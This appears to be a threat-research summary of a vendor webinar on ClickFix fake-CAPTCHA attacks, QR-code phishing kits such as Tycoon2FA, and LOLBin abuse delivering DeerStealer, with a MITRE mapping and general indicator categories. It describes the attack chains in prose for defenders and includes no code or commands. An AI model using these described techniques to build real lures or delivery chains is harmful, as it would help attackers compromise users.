Threat Research

New Malware Tactics: Cases & Detection Tips for SOCs and MSSPs

AnyRun
New Malware Tactics: Cases & Detection Tips for SOCs and MSSPs

A webinar from ANY.RUN detailed evolving malware and phishing techniques—ClickFix, QR-code-enabled PhishKits (e.g., Tycoon2FA), and LOLBin abuse in DeerStealer—demonstrating why interactive sandboxing, automation, and fresh threat intelligence are critical for SOC detection and response. #ClickFix #Tycoon2FA #DeerStealer

Keypoints

  • ClickFix attacks rely on human interaction (fake CAPTCHAs, clipboard hijacking) to execute PowerShell commands and can deploy payloads like Lumma Stealer, AsyncRAT, and DCRAT.
  • PhishKit campaigns increasingly embed malicious links in QR codes (e.g., Tycoon2FA, Mamba2FA) to evade detection and target mobile users, often using multi-stage verification and AI-generated content.
  • Living Off the Land Binaries (LOLBins) such as PowerShell and mshta.exe are abused to hide malicious activity (example: DeerStealer delivery), complicating detection due to use of trusted system utilities.
  • Interactive sandbox analysis that can simulate human actions (solve CAPTCHAs, follow QR-extracted links) is necessary to detect sophisticated multi-stage attacks automated tools miss.
  • Real-time threat intelligence (TI Lookup, TI Feeds) and automation reduce analyst workload, improve detection (88% visible within 60s), cut MTTR (up to 21 minutes), and lower escalations (Tier 1 to Tier 2 reduced by 30%).
  • Attackers use decoy behavior (downloading benign PDFs) and steganography to obscure malicious payload delivery, increasing false-negative risks for standard detection systems.
  • ANY.RUN’s ecosystem (Interactive Sandbox, TI Lookup, TI Feeds) aggregates sandbox telemetry from ~15,000 SOC teams to provide timely IOCs and contextual analysis for faster, more accurate threat detection.

MITRE Techniques

  • [T1056] Input Capture – Clipboard manipulation used to silently copy PowerShell commands to the user’s clipboard (“…a malicious command is copied to the user’s clipboard without any notification…”).
  • [T1204] User Execution – Social engineering and fake CAPTCHAs force users to manually paste and run commands (“…users are instructed to paste and execute clipboard contents through system dialog boxes…”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell is used to execute downloaded commands and payloads (“…run the command…it is a PowerShell script…”).
  • [T1176] Browser Extensions (QR code/URL extraction) – QR codes embedded in PDFs direct victims to malicious pages and the sandbox extracts and follows these links (“…The Sandbox extracts the link from the QR code, follows it to a page with a Cloudflare Turnstile CAPTCHA…”).
  • [T1566] Phishing – Phishkit campaigns and phishing emails with malicious PDF attachments are used to trick users into interacting with embedded QR codes and fake login pages (“…phishing email that has a pdf attachment styled to appear as a legitimate DocuSign document…”).
  • [T1204.002] Malicious File – Shortcut (.lnk) files trigger mshta.exe/PowerShell to download executables (“…a malicious .lnk file that executes mshta.exe through PowerShell to download executable files from remote servers.”).
  • [T1218] System Binary Proxy Execution (LOLBins) – Abuse of system utilities (PowerShell, mshta.exe, cmd.exe) to execute malicious actions while blending with legitimate processes (“…hijacking legitimate Windows system utilities such as PowerShell and mshta.exe to execute malicious activities…”).
  • [T1105] Ingress Tool Transfer – Scripts download final payloads (e.g., DeerStealer) from remote servers as part of the kill chain (“…the script connects to an external server to download the payload…the payload is DeerStealer…”).
  • [T1140] Deobfuscate/Decode Files or Information – Steganography and obfuscation used in ClickFix and phishkit attacks to hide payloads and evade detection (“…ClickFix attacks using steganography payloads…”).

Indicators of Compromise

  • [File Names] malware & persistence artifacts – startup directory files created by DCRAT/AsyncRAT and other payloads (example: files placed in startup folder, and other dropped filenames reported by sandbox).
  • [Threat Names] campaign/tool identifiers – ClickFix, Tycoon2FA, Mamba2FA, DeerStealer – used as detection tags and TI Lookup queries (example: threatName:”ClickFix”, threatName:”qrcode” and threatName:”phishing”).
  • [File Types] malicious attachments/shortcuts – PDF attachments with embedded QR codes and .lnk shortcut files used to launch mshta.exe/PowerShell (example: malicious .pdf with QR code, malicious .lnk file).
  • [URLs/Domains] QR-extracted and payload download links – links obtained from QR codes leading to fake login pages and external servers hosting payloads (example: QR-extracted link to page with Cloudflare Turnstile CAPTCHA, and remote payload download URLs reported in sandbox analyses).
  • [Processes/Binaries] abused system utilities – PowerShell, mshta.exe, cmd.exe observed executing suspicious commands and downloads (example: PowerShell execution of clipboard-pasted script, mshta.exe invoked via .lnk).

Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/new-malware-tactics/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint